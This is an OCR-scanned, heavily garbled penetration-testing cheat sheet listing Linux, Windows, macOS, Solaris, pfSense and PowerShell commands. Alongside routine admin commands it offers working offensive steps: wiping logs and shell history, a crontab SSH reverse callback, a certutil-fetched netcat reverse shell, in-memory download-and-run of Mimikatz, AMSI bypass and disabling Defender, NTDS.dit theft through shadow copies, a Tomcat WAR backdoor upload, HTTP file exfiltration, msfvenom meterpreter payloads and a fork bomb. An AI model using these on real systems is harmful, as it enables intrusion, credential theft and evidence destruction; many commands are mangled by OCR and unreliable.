erent et | 4o x coo Z De. pa 4 has ud — \ A HADESS ©Linux Network commands Command watch ss -tp netstat -ant netstat -tulpn Isof -i smb:// ip /share share user x.x.x.x C$ smbclient -0 user ip \ share ifconfig ethit ip | cidr ifconfig eth0:"1 ip | cidr route add default gw gw Ip ifconfig eth# mtu [size] export MAC=xx: XX: XX: XX: XX: XX ifconfig int hw ether MAC macchanger -m MAC int ilist int scan nc -Iwp port pythons -m http.server port dig -xip host ip host -t SRV _ service tcp.url.com dig @ ip domain -t AXrR Explanation Network communication tep or udp communication -anu=udp ‘Communication with PIDs Established communication smb shared environment access Mount the shared Windows environment Connect to SMB Set IP and netmask Virtual interface setting Set GW Change the MTU size ‘Change the MAC ‘Change the MAC ‘Change Mac in Backtrack Wi-Fi scanner Listening to a specific port Create a web server Identifying the domains of an ip Identifying the domains of an ip Identification of domain SRV Identify DNS Zone XferCommand host ~1 domain namesvr ip xfrm state list ip addr add ip | cidr aev etho Ivar/logimessages | grep DHCP tepkill host ip and port port echo "1" /proc/sys/net/ipv4/ip forward echo "nameserver x.x.x.x" /etc7resolv.cont showmount -e ip mkdir /site_backups; mount -t nfs ip:/ /site_backup system information Command nbstate -A -ip id w Who -a last -a ps -ef df-h uname -a mount getent passwd PATH~$PATH:/home/mypath Explanation Identify DNS Zone xfer ‘Show available VPN ‘Add ‘hidden’ interface DHCP list Blocking ip:port Enable IP Forwarding ‘Add DNS server Show mounted points mount route shared by ip Explanation Get hostname for ip Current username Logged in user User information The last logged in user Available system processes (or use top) The amount of disk usage (or using free) Show the kernel version along with the processor structure Mount the file system Display the list of users Add variable to PATHCommand kill pid cat /etcfissue cat /etc/'release’ cat /proc/version rpm --query -all rpm -ivh ' rpm dpkg -get-selections dpkg -1 \deb pkginfo Which tsesh/eshjkshybash chmod -so tesh/esh/ksh find / -perm -4000 -type f -exec Is -la {} 2>/devjnull ; find / -uid 0 -perm -4000 -type f 2>/devnull find / -writable ! -user whoami -type f ! -path "/proc/" ! - path "/sys/" -exec Is -al {} ; 2>/dev/null Functional commands Command python -c "import pty;pty.spawn('/bin/bash’)" wget http:// url -0 url.txt -o /dev/null rdesktop ip Explanation Kill process with pid Display operating system information Display operating system version information Display kernel version information Installed packages (in Redhat) Installing rpm packages (to remove -e=remove) Installed packages (in Ubuntu) Install DEB packages (to remove - move) Installed packages (on Solaris) Display the paths of executable files Disabling shell and also forcing to use bash Finding files with suid Finding files with suid Show writable files Explanation Shell interactive Get the address Access to desktop ipCommand sep /tmp/file user@x.x.x.x:/tmpjfile scp user@ remoteip :/tmpffile /tmp/file useradd -m user passwd user rmuser unarne script -a outfile apropos subject History num ssh2john.py id_rsa > ssh-key john ssh-key ssh -i |_rsa user@ip id-u cut -d: -f3 < <(getent group GROUPNAME) curl -G ‘http://example.com/file.php' --data-urlencode 'cmd=echo SSh-1Sa AA seen! curl --user 'tomeat:$3cureP4s5w0rd123!" --upload-file exploit. war "http://megahosting.com:8080/ma nager/text/deploy?path=/exploit. war" File commands collection of lines Command Description diff file file2 Compare two files Explanation Send file Get the file added by the user Change user password Delete user Loose recording: Ctrl-D to stop Related commands History of user commands Executive lines in history Find the passphrase Find the passphrase Connect with key and passphrase Get user id Get group id Sending information with the get method in curl Create backdoor with Ifi vulnerability in javaCommand rm -rf dir shred -f -u file touch -r ref file touch -t YYYYMMDDHHSS file sudo fdisk -1 mount /dev/sda# /mnt/usbkey mdSsum -t file echo -n "str" | md5sum shalsum file sort -u grep -c "str" file grep -Hnri word * | vim - grep -rial word tar ef file tar files tar xf file.tar tar czf file tar gz files tar xzf file-tar.oz tar cit tar.b22 files tar xif filetar.b22 gzip file gzip -d file. gz Upx -9 -0 out.exe orig.exe zip -r zipname.zip \Directory\' dd ski of=file [000 count=2000 b: Description Forced deletion of folders nested Rewrite or delete the file Adapting timestamp related to ref_file set file timestamp List of connected drivers Mounting usb devices md§ crisp accounting Generate md5 hash The SHAI hash of the file Relating and displaying unique lines Search for the desired word in files along with the file name Files containing the desired word Create tar from files Extract tar Create targz Extract tar.gz Create .tar.b22 Extract tar.b22 Compress and rename the file Not compressing file.gz Get UPX packs related to orig.exe Create zip Separate 1 to 3 KB from the fileCommand split -b 9K file prefix awk ‘sub("$""\r")' unix.tet win.tet find -i -name file -type ‘pdf find | -perm -4000 -o -perm -2000 -exec Is- Idb O\; dos2unix file file file chattr (+/-)i file while [ $? -eq 0 J; do cd flag/; done cellaneous commands Command unset HISTFILE ssh user@ ip arecord - | aplay ~ gec -0 outfile myfile.c init 6 cat /ete/ 1 syslog 1 .conf 1 grep -v ""#" grep ‘href= file 1 cut -d"/" -f3 | grep url \ dd if=/dev/urandom of= file bs=3145728 count=100 Controller commands Description Separation of 9 KB sections from the file ‘Windows compatible txt file Search for POF files Search setuid files Switch to *nix format Determine the file type and format setting or not setting the immutable bit Enter infinite nested folder Explanation Disable reports in history Remote microphone recording Compile C, C++ Restart (0 = shutdown) list of report files ‘Separation of links sort -u url.com Create a3 MB fileCommand echo "" /var[log/auth.log echo "" -/.bash history rm -/.bash history/ -rf history -c export HISTFILESIZE=0 export HISTSIZE=0 unset HISTFILE kill -9 $$ In [dev/null -/-bash_historj - sf File system structure Position Explanation Explanation Delete the auth.log file Delete the session history of the current user Delete the file bash_history Delete the session history of the current user Setting the maximum lines of the history file to zero Setting the maximum number of commands in the history file to zero delete history (need to log in again to apply) Delete the current meeting Permanently send all history commands to /devjnull bin System binary files Iooot Files related to the boot process [dev Interfaces related to system devices etc System configuration files Thome A basic place for users and libraries Jopt Essential software libraries Iproc Executive and systemic processes [root The base path for the root user Isbin executable files of the root user [tmp Temporary files Jusr Not very necessary files Ivar System variables fileFiles File [etc/shadow [etc/passwd Jetc/group etcjre.d Jetcfinit.d Jetc/hosts Jetc[HOSTNAME Jetc/network/interfaces Jetc/profile [etc/apt/sources.list Jetc/resolv.cont Ihorne/ user /-bash history Jusr/share/wireshark/manuf -/ssh/ Watlog Ivarjadrn Nar/spool/eron Ivarflog/apache/access.log etc/fstab Using powershell Installation Explanation Hash of local users. Local users Local groups Startup services Services List of hostnames and IPs Show hostname along with domain Network communication System environment variables list of ubuntu distribution sources namserver settings bash history (also in /root/) MAC Manufacturer Location of ssh keystores System reports file (for Linux) System reports file (for Unix) List of files in cron ‘Apache communication reports Fixed system information file sudo apt install gss-ntlmsspsudo apt-get install powershelt Login using username and password pwsh Sof fsec_session = New-PSSession ~ComputerName 10.10,10,210 ~Authentication Negotiate ~Cre Enter-PSSession $offsec_session Create symlink New-Item -ItemType Junction -Path 'C:\ProgranData' —Target ‘C:\Users\Administrator! Script writing Create Ping sweep for x in {1 .. 254 .. Usdo ping -c 11.1.1.$x Igrep "64 b" Lcut -d" "-f4 ips.txt; done Automating the domain name resolve process in the bash script #1/bin/bash echo “Enter Class C Range: i-e. 192.168.3" read range for ip in (1... 254... Us do host Srange.$ip Igrep " name pointer " cut -d" done Creating a Fork bomb (Creating a process to crash the system) POG & he dns reverse lookup processfor ip in {1 .. 254... 1}; do dig -x 1.1.1.Sip | grep sip dns.txt; done Do not block Ip script #1/bin/sh # This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2 # It assumes 1 is the router and does not ban IPs .20, .21, .22 while $i -le 253 U do if [ $i -ne 2@ -a $i -ne 21 -a $i -ne 22 1; then echo “BANNED: arp -s 192. 168.1. $i' arp ~s 192.168.1.$i 00:00:00:00:00:0a else echo "IP NOT BANNED: 192. 168.1.$i" Create SSH Callback Set up script in crontab to callback every X minutes. Highly recommend YOU set up @ generic user on red team Computer (with no shell privs). Script will use the private key (located on callback source computer) to connect to a public key (on red team computer). Red teamer connects to target via a local SSH session (in the example below, use #ssh -p4040 localhost) #1/bin/sh # Callback: script located on callback source computer (target) killall ssh /dev/null 2 61 sleep 5 RENLIS-4040 REMUSR user HOSTS=" *domainl. com domain2.com domain3.com'* for LIVEHOST in SHOSTS; do COUNT=S(ping -c2 SLIVEHOST | grep ‘received’ | awk -F','{ print $2 } ' | awk * ( print $1 |‘) if LL SCOUT -gt @ 1] 5 then ssh -R $(REMLIS}: localhost: 22“shome/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR} fi Iptables command Use iptable for ipv6 Command iptables-save -c file iptables-restore file iptables -L -v --line-numbers iptables -F iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP. iptables -A INPUT -iinterface -m state RELATED, ESTABLeSHED -j ACCEPT iptables -D INPUT 7 iptables -t raw -L-n iptables -P INPUT DROP Allow ssh and port 22 in outbound Description Extract iptable rules and save to file retrieving iptables rules List of all rules with their line number Restart all rules Policy change if rules are not met Allow connections made on INPUT Remove 7 layers of inbound rules Increase productivity by disabling statefulness Delete all packets iptables -A OUTPUT -o iface -p tcp —dport 22 -m state —-state NEW, ESTABLISHED —j ACCEPT iptables -A INPUT -i iface —p tep spurt 22 -m state ESTABLISHED -} ACCEPT Allow ICMP in outbandiptacles -A OUTPUT -i iface -p icmp —icmp-type echo-request -j ACCEPT iptables -A INPUT -o iface -p icmp -~icmp-type echo-reply -j ACCEPT Create port forward echo "1" /proc/sys/net/ipv4/1p forward # OR- sysctl net.ipv4.ip forwar iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip —dport 443 -to-destination atk ip :443 iptables -t nat -A POSTROUTING -p tcp -i ethO -j SNAT -s target subnet cidr -d attackip --dport 443 -to-source pivotip iptables -t filter -I FORWARD 1 -j ACCEPT Allow 1.1.1.0/24 and port 80,443 and create log in /var/log/messages iptables -A INPU~ -s 1.1.1.0/24 -m state —state RELATED, ESTABLISHED NEW =p tcp -m multipart —-dports 80,443 -j ACCEPT iptables -A INPUT -i ethO -m state —state RELATED, ESTABLISHED -j ACCEPT iptables -P INPUT DROP iptables -A OUTPUT -o ethO -j ACCEPT iptables -A INPUT -i lo ~j ACCEPT iptables -A OUTPUT -o lo -j ACCEPT iptables -N LOGGING iptables -A INPUT -j LOGGING iptables -A LOGGING -m Limit --Limit 4/min -j LOG —log-prefix "DROPPED " iptables -A LOGGING -j DROP Update-rc.d file Check and create launcher Command Description [+] Service starts at boot service --status-all [-] Service does not start service service start start service service service stop stop serviceCommand service service status update-rc.d -f service Description Check service status Remove the existing system startup service (-f for the /etcyinit.d file if remove it already exists) update-re.d service defaults Chkconfig ‘Added service in system startup Available in red hat distributions such as centos and oracle Command chkconfig --list chkconfig service -list chkconfig service on [--level 3] chkconfig service off [--level 3] e.g. chkconfig iptables off Screen command Command Explanation screen -S name screen -Is screen -r name screen -S name -X List of running screens Explanation List of available services and implementation status The status of a service Adding the service [Its layer can also be specified] Remove the service Create a new screen with the name Addition to screen with the name Send command to screen with the name cmd Ca? List of key combinations (help) cad Addition removal c-aDD Removal of joining and leavingCommand Explanation Cac Create a new window C-aC-a Switch to the last window am as Switch to the window named Ca" Show window list and changes Cak Delete the current window cas Horizontal separation of the display Cav Vertical separation of the display C-atab Jump to the last screen C-ax Delete the current section ca Delete all sections except the current section x11 Remote recording of X11 window and changing its format to JPG xwd display ip :0 -root -out /tmp/test. xpm xwud -in /tmp/test1.xpm convert /tup/test.xpm —resize 1280x1024 /tmp/test. jpg Open X11 in stream mode xwd -display 1.1.1.1:0 -root -silent -out x11dump Read dumped file with xwudtopnm or GIMP TCPDump command Record packets in ethO and change it from ASCII and hex and save it in the file‘tcpdump -i ethO -XXx -w out. pcap Recording of all traffic 2.2.2.2 tcpdump -i ethO port 80 dst 2.2.2.2 Show all ip connections tcpdump -i ethO -tttt dst 192.168.1.22 and not net 192.168.1.0/24 Show all ping outputs tcpdump -i ethO 'icmpLicmptype] iicmp-echoreply' Record 50 dns packets and display timestamp tcpdump -i ethO -c 50 -tttt ‘udp and port 53° Kali default commands Equivalent to WMIC wmis -U DOMAIN, user % password //DC cmd.exe /e command Mount SMB shared space # Mounts to /mnt/share. For other options besides ntlnssp, man mount.cifs nount.cifs // ip /share /unt/share 0 usersuser, pass=pass, sec=ntlnssp, donain=domain, rw KALI UPDATEapt-get update apt-get upgrade Checking the operating system for the possibility of upgrading access https: //github. com/rebootuser/LinEnum Example: ./LinEnum.sh ~s -k keyword -r report -e /tmp/ -t List of all processes with root access https: //github.con/DominicBreuker/pspy For example: «/pspy64 -pf -i 1000 The PFSENSE command Command pfSsh.php pfSsh.php playback enableallowallwan pfSsh.php playback enablesshd pfctl -sn pfctl -sr pfctl -sa vicontig rm /tmp/config.cache Jetc/rc.reload_all Explanation Shell pfSense Allowing connections to inbound connections on the WAN (Adding hidden rules to WAN rules ) Enable inbound/outbound ssh Show NAT rules. Show filter rules Show all rules Edit settings Target cache (or backup) settings after its execution Reload the entire configuration SOLARIS operating systemCommand ifconfig -a netstat -in ifeonfig -r ifconfig etho dhep ifconfig ethO plumb up ip netmask nmask route add default ip logins -p sves -a prstat -a sveadm start ssh inetadm -e telnet (-d for disable) prtcont | grep Memorj iostat -En showrev -c Jusr/bin/bash shutdown ~i6 -g0 -y dfmounts sme snoop -d int -c pkt # -o results.pcap Jetc|vfstab Jvarfadmjlogging Jetc/default/' Jetc/system Ivarfadm/messages Jetc/auto' Jetcfinetfipnodes Explanation List of all interfaces List of all interfaces List of routes Start DHCP in user IP setting Gateway setting List of users and passwords List of all services along with status Status of processes (also command top) Start the SSH service telnet activation Total physical memory Hard disk size Binary information Restart the system List of users connected to NFS GUI management Packet recording Mounted system file table Reports list of login attempts Default settings Kernel modules and settings syslog path Automounter settings file IPv4 and IPv6 hosts filesImportant cache files File Description =/viminfo. vim editor file Mac Situational Awareness Command top ps aux netstat tcpdump, tail + /var/log/system.log log show --predicate ‘process "PROCESS_NAME" --info fs_usage Explanation shows real-time system statistics including CPU usage, memory usage, and running processes. displays a list of running processes with their associated details. displays active network connections, routing tables, and a number of network interface and protocol statistics, allows the capture and analysis of network traffic. displays real the macOS system log. displays system log entries for a specific process. shows real-time file system activity, inclu are being accessed and by which processes. ime updates to 19 which files shows all active network connections and which processes are using them.displays a list of running processes with their associated details,Command Explanation displays a graphical fseventer representation of file system activity allows the tracing and dtrace 2 analysis of system events. displays alist ofall currently launchetl ist loaded launch daemons and agents. User Plist File Enumeration Command /Users//Library/Preferences/.GlobalPreferences. plist /Users//Library/Preferences/ defaults read defaults write defaults delete PlistBuddy -c “Open " PlistBuddy -c “Add " PlistBuddy -c “Delete " PlistBuddy “Set " Explanation The user plist file for the currently logged-in user can be found in here Other user plist files can be found in here Read a plist file Write a plist file Delete a key froma plist file Open a plist file Print a value from a plist file Add a new key-value pair to a plist file Delete a key froma plist file Set the value of a keyCommand plutil -Lint plutil -convert xml1 User & Group Command sudo dscl . -create /Users/newusername sudo dscl . -passwd /Users/newusernane password sudo dscl . -append /Groups/admin GroupMenbership newusername sudo dseditgroup -o create "Group Name" groupname sudo dseditgroup -o edit -a username -t user groupname dscl . -read /Groups/groupname GroupMembership sudo dseditgroup -o delete groupnane sudo dseditgroup -o edit -d username -t user groupname sudo dseditgroup -o edit -n newgroupname -r oldgroupname Windows Versions Number or 1D ns NT3.1 Windows NT 3.1 (All) NT3.5 Windows NT 3.5 (All) NT351 Windows NT 3.51 (All) NT 4.0 Windows NT 4.0 (All) Explanation Validate a plist file Convert a plist file to. XML format Explanation create a new user set the user's password make the user an administrator create a new group add users to the group list the members of a group delete a group remove a user from a group rename a groupD Versions NT50 Windows 2000 (All) NT5.1 Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise) NT 5.2 Windows Home Server Reo Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, : Ultimate) NT6A Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 " (Foundation, Standard, Enterprise) ar) Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone & " Windows Server 2012 (Foundation, Essentials, Standard) Files Command Explanation %SYSTEMROOT% Usually C:\Windows %SYSTEMROOT%\System32\drivers\etc\hosts %SYSTEMROOT%\System32\drivers\ete\networks %SYSTEMROOT% system32 config\SAM %SYSTEMROOT%\repain\SAM %SYSTEMROOT%\System32\config\RegBack\SAM, SAWINDIR%\system32\config\AppEvent.Evt SAWINDIR%\system32\config\SecEvent.Evt S*ALLUSERSPROFILE%\Start Menu\Programs\Startup\, S@USERPROFILE%\Start Menu\Programs\Startup\, %SYSTEMROOT%\Prefetch DNS Entities Network settings Username and password hash Copy of SAM Backup copy of SAM Program reports Security reports Startup path Startup path Path Prefetch (EXE reports)Launcher paths For WINDOWS NT 6.1,6.0 # ALL users aSystenDrive®\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup # Specific users SystemDrives\Users\sUserName®\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Star For WINDOWS NT 5.2, 5.1, 5.0 asystemDrive®\Documents and Settings\All Users\Start Menu\Programs\Startup FOR WINDOWS 9x asystemDrives\umi0WS\Start Menu\Programs\Startup for WINDOWS NT 4.0, 3.51, 3.50 aSystemDrive®\WINNT\Profiles\ALL Users\Start Menu\Programs\Startup System information commands Command Explanation Operating version system version sc query state=all Show es services show taskiist/sve process and servicesCommand tasklist /m tasklist /S ip /V taskkill /PID pid /F systeminfo /S ip /U domain\user /P Pwd reg query \ ip \ RegDomain \ Key /v VALUE reg query HKLM /f password /t REG_SZ /s. reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WuUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate fsutil fsinfo drives dir /a Js [b c:.pat* dir /a /b c:\windows\kb' findstr /si password’ .txt | + xmll «xis Explanation Show all processes and dlls Remotely running processes Forced removal of the process Receive system information remotely Senda query to the registry, /s=all values Registry search for passwords wsus address List of drivers + need admin access Search for all pdf files Search for patches Search files forCommand tree /F /Ac: tree.txt reg save HKLM\Security security.hive echo %USERNAME% Wwhoami /priv command net/domain Command net view /domain net view domain: [MYDOMAIN] net user /domain net user user pass /add net localgroup “Administrators” user Jada net accounts /domain net localgroup "Administrators" net group /domain net group "Domain Admins" [domain net group "Domain Controllers" /domain net share net session | find | net user user /ACTIVE:yes [domain Explanation passwords List of folders on, drive C: Save security hives inside the file Current user Current user permissions Description Current domain host hosts in [MYDOMAIN] Allusers of the current domain ‘Add user ‘Add user to Administrators Domain password policies List of Local Admins List of domain groups List of Admin users in the domain List of DCs for the current domain ‘SMB share List of active SMB sessions Open domain domainCommand Description net user user" newpassword" /domain Change domain username and password net share share c:\share Shared folder IGRANT:Everyone, FULL Remote commands Command tasklist /S ip /v systeminfo /S ip /U domain\user /P Pwd net share \\ ip net use \\ ip net use 2: \\ ip \share password Juser: DOMAIN user reg add \\ ip \ regkey \ value sc \\ip create service binpath=C:\Windows\System32\x.exe start=auto cmd.exe /c certutil -uricache -split -f http:/fipinc.exe c:}windows/temp/nc.exe cmd.exe /c c:/windows/tempjnc.exe ip port ~e cmd.exe nc.exe -Ivvp port pythons -m http.server port xcopy /s \\ip \dir C:local shutdown /m \\ip /r/t 0 ft Network commands Description Processes running on ip IP information ip environment ip system file Map drive, specified credentials Added registry key for ip Create a remote service (space after start=) Copy file from ip to current system by cmd.exe Shell reverse Listening on specific port Create webserver Copy of ip fodder restart system with ipCommand ipconfig | all ipconfig /displaydns netstat -ana netstat -anop tep 1 netstat -ani findstr LISTENING route print arp -a nslookup, set type=any, Is -d domain results.txt, exit nslookup -type=SRV _www._tep.url.com titp -1 ip GET remotefile netsh wlan show profiles netsh firewall set opmode disable netsh wlan export profile folder=. key=clear netsh interface ip show interfaces netsh interface ip set address local static ip nmask gw ID netsh interface set dns local static ip netsh interface ip set address local dhep Functional commands Command type file del path \'.- /a /s [a /f Description ip settings DNS cache Show connection Create Netstat loop Ports in use Route tables Get system MACs (using ARP table) Get DNS Zone Xfer Get Domain SRV lookup (Idap, Kerberos, sip) File Transfer in TFTP Profiles stored on the wireless network Firewall deactivation (‘Old) wifi extraction in plaintext List of IDs/MTUs related to interfaces Set IP DNS server configuration Set interface to use DHCP Description Show file contents Delete files in current pathCommand find /l "str" filename command | find /c /v "" at HH:MM file [args] (ie. at 14:45 cmd /c) runas /user: user " file [args]" restart /r/t O sc stop UsoSve sc start UsoSve. sc config UsoSve binpath: C:\windows\system32\cmd.exe" tr-d "\15\32" win.tet unix.txt makecab file Wusa.exe /uninstall /kb: ##4# cmd.exe "wevtutil ge Application /c:40 ffrtext frd:true" lusrmngrmse services.msc taskmgr.exe secpool.rnse eventvwr.rnse MISC. commands Locking the workstation Description List of cmd outputs File execution schedule Execute file with specific user Restart Stop the UsoSve service Starting the UsoSve service Change path of executable file by UsoSve Delete CR & 'Z (‘nix) Compression Delete patch Using the Event Viewer in the CLI Using Local user manager Using Services control panel Using Task manager Using Security policy manager Using Event viewerrund1132.d11 user32.d1L LockWorkstat ion Disable Windows Firewall netsh advfirewall set currentprofite state off netsh advfirewall set allprofiles state of OF Create port forward (*need admin access) netsh interface portproxy add vatova Listenport=3000 Listenaddres: #Remove netsh interface portproxy delete vatov4 Listenport=3000 Listenaddress=L.L.L.L +LLeL connectport=ae BEEEEETTTTLTLTLTLTLTLTLTLTTTTTT_C*?di enable cmd reg add HKCU\Sof tware\Policies\tlicrosoft\Windows\System /v DisableCHD /t REG DWORD /d @ REEEEEEEEEEETETELTLTLTLTLTLTLTLTLTLTLTLTLTLTLTLTLTLCLLLTT_C*?ds PSEXEC command Remote file execution with specific identity information psexec /accepteula \\ targetiP -u domain\user -p password -c -f \\ smbiP \share\file.exe SNR Execution of command with special hash psexec /accepteula \\ ip -u Domain\user -p Lt1 c:\Program-1 Run the command on the remote system psexec /accepteula \\ ip -» cmd.exeTerminal service (RDP) Start RDP Create regfile.reg file with following line in it: HKEY LOCAL t1ACHINE\SYSTEH\CurrentCont “fDenyTSCo~nections"=dword: 00000000 reg import reg file. reg net start ''terrnservice' sc config terrnservice start= auto net start terrnservice ore reg add "HKEY LOCAL tiACHINE\SYSTEH\CurentControlset\Control \Terminal Server" /v fDenyTS RDP tunnel from port 443 (need to restart the terminal service) REG ADD "HKLt1\System\CurrentControlset\Control \Terminal Server\WinStations\ROP-Tcp" /v Remove network authentication by adding an exception in the firewall reg add “HKEY LOCAL tIACHINE\SYSTEt1\CurentControlset\Control \Terminat Server\WinStations\ROP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f netsh firewall set service type ~ remotedesktop mode ~ enable Import task from XML file schtasks.exe /create /tn tlyTask /xml "C:\MyTask. xml" /f WMIC command Command Description wmic [alias] get /? List of all features wmic [alias] call /? Callable methodCommand wmic process list full wmic startupwmic service wmie ntdomain list wmic afe wrnic process call create "process_name" wmic process where name="process" call terminate wmic logicaldisk get description,name wmic cpu get DataWidth /formatilist wmic service where started = true get name, startname WMIC [alias] [where] [clause] Description process properties start wmic service Domain and DC information List of all patches Run process Delete process Display logical sharing environment Show 32-bit or 64-1 system it version of the Show running services [alias] == process, share, startup, service, nicconfig, useraccount, ete. [where] [clause] inere (name="cmd.exe"), where (parentprocessid!=[pid]"), etc. list [fulllbrief], get [attribl, attrib2], call [method], delete Run the file in smb with specific identity information wnic node: targetiP /usersdomain\user /password:password process call create "\ \ smbiP Remove the software wnic product yet name /value # Get software names wnic product where nane="XXX" call uninstall /nointeractive Remote user accesswmic /node:remotecomputer computersystern get username Show processes in real time wmic /nod: rmachinename process List brief /every:1 Start RDP wmic /node:"machinenane 4" path Win32_TerminalserviceSetting where AllowTSConnections="'0'' call SetALlowTSConnections ''1'* The list of times that the user has entered wmic netlogin where (name Like "%adm¥") get numberof logons Search services for unquoted routes wnic service get narne,displayname, pathnarne, startrnode | findstr /i nauton | findstr /i /v "C:\windows\\" | findste si sv" Copy of Volume shadow 1. wmic /node: DC IP /user:"DOTIAIN\user" /password:"PASS" process call create “cmd /e vssadmin List shadows 2&1 c:\temp\output. txt" # If any copies alread] exvst then exfil, otherwise create using following commands. Check output.txt for anJ errors 2. wmic /node: DC IP /user:"DUMAIN\user" /password:"PASS™ process call create “cmd /c vssadmin create shadow /for=C: 2 &1 C:\temp\out put. txt" 3. vic /nude: DC IP /user:"DOMAIN\user" /password:"PASS" process call create “cmd /c copy \\?\GLOBALROOT\Device\HarddiskVol~meShadowCopy1\Windows\Syste Cz \temp\system.hive 2 81 Cz \temp\output. txt" 4. ynic /ude: DC IP fuser: "DOL". LLUN\user /passwoid: "PASS" process call Create ‘und \\?\GLOBALROOT\Device\Har ddiskVolumeShadowCopyc\NTDS\NTDS. dit Cz\temp\ntds.dit 2 &1 C:\temp\output. txt” Step by step instructions on room362.com for step below 5. From Linux, download and run ntdsxtract and Libesedb to exporthashes or other domain information a, Additional instructions found under the VSSOWN section b. ntdsxtract - http://mw.ntdsxtract.com POWERSHELL environment Command stop-transcript get-content file get-help command-examples get-command ‘string’ get-service get-wmiobject -class win32 service $PSVersionTable powershell.exe version 2.0Command get-service measure-object get-psdrive get-process select -expandproperty name get-help '-parameter credential get-wmiobject -list -'network' (Net.DNS]: :GetnostEntry(" ip "I powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe" poweshell.exe -c "IEX (New-Object System.Net WebClient).DownloadString('http://10.10.10.10:8000/1 cmd https:/gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fddeO7dde6fad4ed/raw/8078a5 1bbfalt https://rawgithubusercontent.com/PowerShellMatia/PowerSploit/master/Exfiltration/Invoke-Mimikatz call pst filesCommand Bypass AMSI Inport-Module .\Invoke-Obfuscation\Invoke-obfuscation.psm1 Out-ObfuscatedTokenConmand -Path .\powerview.ps1 | Out-File out or https: //raw.githubusercontent. com/kmkz/Pentesting/master/ANSI-Bypass. ps1 + + \AMSI-Bypass. ps1 Invoke-Ans iBypass Disable realtimemonitoring powershell -conmand set-mpppreference -Disable realtimemonitoring $true List of all users Susers = New-Object DirectoryServices .DirectorySearcher Susers. Filter = "(&(objectclass=user))" Susers.SearchRoot = '' Susers. FindALL() List of all domains Sconputers = New-Object DirectoryServices.DirectorySearcher Sconputers.Filter = "(&(objectclass=computer))" Scomputers.SearchRoot = '' Scomputers.FindALL() Get AD credentials using donotrequirepreauth Set-ADAccountControl —identity jorden -doesnotrequirepreauth 1Deleting security reports and programs (for SVRO1) Get-EventLog -list Clear-EventLog -logname Application, Security -computername SVRO1 Extract the version of the operating system inside the CSV file Get-WimiObject -class win32 operatingsystem | select -property ' | export-csv c:\os.txt List of running services Get-Service | where_object {$_.status -eq “Running"} Using ps drive for permanent sharing New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1-1\tools -Name i Files written on 8/20 Get-Childiten Path c:\ Force —Rec~rse —Filter ‘. log —ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"} Get file from http (new-object sjstem.net.webcLient).downloadFile(''url'', "dest! tcp port connections (scanner) Sports=(#,#,#) ;$ip="x.x.x.x";foreach (Sport in $ports) {try (Ssucket=New-object Sjstem.Net.Suckets. TCPCLient (Sip, $port); Featch(}; Af (Ssocket -eq $NULL) (echo Sip":"$port"— Closed"; } elselechy $ip":"Spurt” Open"; $sucket =SNULL; HE Ping command with 500 millisecond timeoutSping = New-Object Sjstex.Net-Networkinformation.ping sping.Send( ip’ ',530) Basic authentication window powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential(" title "," message "," user” Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700 Powershell. exe -Conmand “do {if ((Get-Date -format yyyydd-HHinm) -match "201308 ( @ [ 8-9] |1 [0-1])-(Of 8-9]]|1 { @-7]) { 0-5] [ 0-9]') {Start-Process — Windowstyle Hidden "C:\Temp\my.exe";Start-Sleep -s 14400) )while(1)" Run Powershell as Spw ~ convertto-securestring -string "PASSWORD" -asplaintext —force; Spp ~ new-object —typename System.Management. Automation. PSCredential argument List "DOMAIN\user", $pws Start-Process powershell -Credential Spp ArgumentList '-noprofile —command {Start-Process file.exe -verb runas)" Upload with powershell powershell wr ~ usebasieparsing http://192.168.2. x/SharpHound. exe ~ OutFlle ~ SharpHound. exe Email sender powershell.exe Send-l-lailHessage -to “email from “enail" -subject “Subject -a “attachment file path" -body "Body" -SmtpServer Target Email Server IP Activating remote access to powershell (requires identity information) net time \\ip at \\ip time "Powershell -Command ‘Enable-PSRemoting —Force:at \\ip time+1 “Powershell -Command 'Set-Item wsman:\locathost\client\trustedhosts ''"* at \ \ip time+2 "Powershell -Command ‘Restart-Service WinRM'" Enter-PSSession ~ComputerName ip Credential username hostname and ip list for all domains Get-viniObject -ComputerName DC -Namespace root\microsoftONS -Class MicrosoftONS _ ResourceRecord -Filter "domainname~' DOMAIN ' | select textrepresentation Download from Powershell from specific path powershell.exe -noprofile -noninteractive -conmand “ [System.Net.ServicePointManager] ::ServerCertificateValidationCal back = {Strue); $source="""https:11 YOUR SPECIFIED IP I file.zip ""; Sdestinat io raster. zip"; $http = new-object Systern.Net.WebCLient; Sresponse= Shttp.DownloadFile($source, $destination) ;" Display Powershell data Script will send a file ($filepath) via http to server (Sserver) via POST request. Must have web server listening on port designated in the $server powershell.exe -noprofile -noninteractive -command "[S;stem.Net.ServicePointManayer] ::ServerCertificateValidationCal tback = {Strue); $server="""http:// YOURSPECIFIED IP / folder "™"; Sfilepath="C:\naster. zip" $http= new=object System.Net.WebCLient; Sresponse= $http.UploadFile($server, $filepath); Using powershell to run meterpreter from memory Need Metasploit v4.5+ (ustvenum supports Power shell) Use Powershell (x86) with 32 bit Meterpreter payloads encodeMeterpreter.psl script can be found on next page in the attacking system1. ./msfvenom -p Windows/meterpreter/reverse https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 2. Move audit.psl into same folder as encodeMeterpreter.pst 3. Launch Powershell (x86) 